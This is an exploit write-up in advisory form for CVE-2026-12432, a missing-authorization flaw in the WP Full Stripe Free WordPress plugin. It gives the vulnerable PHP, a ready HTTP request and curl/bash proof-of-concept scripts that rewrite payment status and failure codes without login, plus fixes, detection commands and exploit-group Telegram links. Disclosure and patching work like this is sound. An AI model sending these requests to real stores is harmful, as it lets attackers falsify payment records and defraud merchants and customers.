Exploit for 📄 WordPress WP Full Stripe Free 8.4.3 Missing Authorization CVE-2026-12432

## https://sploitus.com/exploit?id=PACKETSTORM:224503
# CVE-2026-12432: WP Full Stripe Free <= 8.4.3 - Missing Authorization
    
    ## Overview
    
    - **CVE ID**: CVE-2026-12432
    - **CVSS Score**: 5.3 (Medium)
    - **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
    - **Affected**: Stripe Payment Forms by WP Full Pay <= 8.4.3
    - **Patched**: >= 8.4.4
    - **Published**: June 26, 2026
    - **Last Updated**: June 27, 2026
    - **Researcher**: Netwurm - VTDR e.V.i.G.
    
    ## Vulnerability Description
    
    The WP Full Stripe Free plugin for WordPress is vulnerable to **Missing Authorization** in versions up to, and including, **8.4.3** via the `wpfs_update_failed_payment_status` AJAX action.
    
    ### Root Cause
    
    The vulnerable AJAX endpoint is registered through both `wp_ajax_` and `wp_ajax_nopriv_` hooks:
    
    ```php
    // wpfs-customer.php, Line 705-706
    add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
    add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
    ```
    
    The `update_failed_payment_status()` function (Line 3835-3865) performs:
    - ❌ **NO capability check** (no `current_user_can()`)
    - ❌ **NO nonce verification** (no `wp_verify_nonce()`)
    - ❌ **NO logged-in check** (no `is_user_logged_in()`)
    
    ### Vulnerable Code
    
    ```php
    // wpfs-customer.php, Line 3835-3865
    function update_failed_payment_status() {
        try {
            $result = [];
            $failureCode = isset( $_POST['failureCode'] ) ? sanitize_text_field( $_POST['failureCode'] ) : null;
            $failureMessage = isset( $_POST['failureMessage'] ) ? sanitize_text_field( $_POST['failureMessage'] ) : null;
            $paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;
    
            $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
            // ... no auth check before processing ...
    
            $updateData = [
                'paid' => 0,
                'captured' => 0,
                'refunded' => 0
            ];
    
            // Attacker can overwrite with controlled values
            if ( $lastCharge ) {
                $updateData['last_charge_status'] = $lastCharge->status;
                $updateData['failure_code'] = $lastCharge->failure_code;
                $updateData['failure_message'] = $lastCharge->failure_message;
            } else {
                $updateData['last_charge_status'] = 'failed';
                $updateData['failure_code'] = $failureCode;
                $updateData['failure_message'] = $failureMessage;
            }
    
            $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
            // ...
        }
    }
    ```
    
    ## Attack Vector
    
    ### Prerequisites
    - Payment Intent ID must be known (exposed in browser during normal Stripe checkout)
    - No authentication required
    
    ### Attack Steps
    
    1. **Identify Target**: Find WordPress site with WP Full Stripe Free <= 8.4.3 installed
    2. **Obtain Payment Intent ID**: Extract from Stripe.js checkout flow or prior transactions
    3. **Send Malicious Request**: Craft POST request to admin-ajax.php with attacker-controlled parameters
    
    ### HTTP Request
    
    ```http
    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: target.com
    Content-Type: application/x-www-form-urlencoded
    
    action=wpfs_update_failed_payment_status&paymentIntentId=pi_XXXX&failureCode=ATTACKER_CODE&failureMessage=ATTACKER_MESSAGE
    ```
    
    ## Impact Assessment
    
    | Impact Area | Severity | Description |
    |-------------|----------|-------------|
    | **Integrity** | Medium | Attackers can mark successful payments as failed |
    | **Confidentiality** | None | No data exposure |
    | **Availability** | Low | Could disrupt business operations |
    
    ### Specific Impacts
    
    1. **Payment Record Manipulation**: Attacker can modify payment status from "paid" to "failed"
    2. **False Failure Codes**: Attacker can inject arbitrary failure codes/messages
    3. **Social Engineering**: Could be used to defraud customers or dispute legitimate charges
    4. **Audit Trail Corruption**: Business records can be falsified
    
    ## Proof of Concept (curl)
    
    ### Basic Detection
    
    ```bash
    # Test if endpoint is accessible without authentication
    curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
      -d "action=wpfs_update_failed_payment_status" \
      -d "paymentIntentId=test_cve202612432" \
      -d "failureCode=TEST_CODE" \
      -d "failureMessage=TEST_MESSAGE"
    
    # Expected response (vulnerable):
    # {"success":false,"messageTitle":"Internal Error","message":"Invalid API Key provided...","exceptionMessage":"..."}
    
    # The key indicator is that the endpoint responds WITHOUT requiring authentication
    ```
    
    ### Full PoC Script
    
    ```bash
    #!/bin/bash
    TARGET="https://TARGET"
    
    # Check if vulnerable
    echo "[*] Testing CVE-2026-12432..."
    
    RESPONSE=$(curl -s -k -X POST "$TARGET/wp-admin/admin-ajax.php" \
      -d "action=wpfs_update_failed_payment_status" \
      -d "paymentIntentId=test_123" \
      -d "failureCode=XSS" \
      -d "failureMessage=INJECTED")
    
    if echo "$RESPONSE" | grep -q "success"; then
        echo "[+] VULNERABLE - Endpoint accessible without auth"
    else
        echo "[-] Not vulnerable or error"
    fi
    ```
    
    ## Remediation
    
    ### Immediate Fix
    
    Add authorization check to `wpfs-customer.php` at line 3835:
    
    ```php
    function update_failed_payment_status() {
        // ADD THIS CHECK
        if (!current_user_can('manage_options')) {
            wp_die('Unauthorized');
        }
        // ... rest of function
    }
    ```
    
    ### Recommended Fix (by vendor)
    
    Update to **WP Full Stripe Free >= 8.4.4**
    
    ```bash
    # Via WordPress Admin
    Dashboard > Plugins > WP Full Stripe > Update
    
    # Via WP-CLI
    wp plugin update wp-full-stripe-free
    
    # Via SSH
    wp plugin update wp-full-stripe-free --version=8.4.4
    ```
    
    ## Detection
    
    ### Manual Check
    
    1. Check plugin version in WordPress admin
    2. Review `wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php`
    3. Look for missing `current_user_can()` before AJAX handlers
    
    ### Automated Detection
    
    ```bash
    # Check if vulnerable version is installed
    curl -s https://TARGET/wp-content/plugins/wp-full-stripe-free/readme.txt | grep -i "Stable tag"
    
    # Test AJAX endpoint
    curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
      -d "action=wpfs_update_failed_payment_status" \
      -d "paymentIntentId=test" | grep -q "success" && echo "Potentially Vulnerable"
    ```
    
    ## References
    
    - [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/cve-2026-12432)
    - [Plugin Trac](https://plugins.trac.wordpress.org/browser/wp-full-stripe-free/tags/8.4.3/includes/wpfs-customer.php)
    - [Patchstack Database](https://patchstack.com/database/)
    
    ## W.P.E.F
    - [W.P.E.F Telegram chanel #1](https://t.me/wpef0)
    - [W.P.E.F Telegram chanel #2](https://t.me/wpef01)
    --
    
    ## Timeline
    
    - **June 26, 2026**: Vulnerability publicly disclosed
    - **June 27, 2026**: CVE-2026-12432 published
    - **Patch**: Update to >= 8.4.4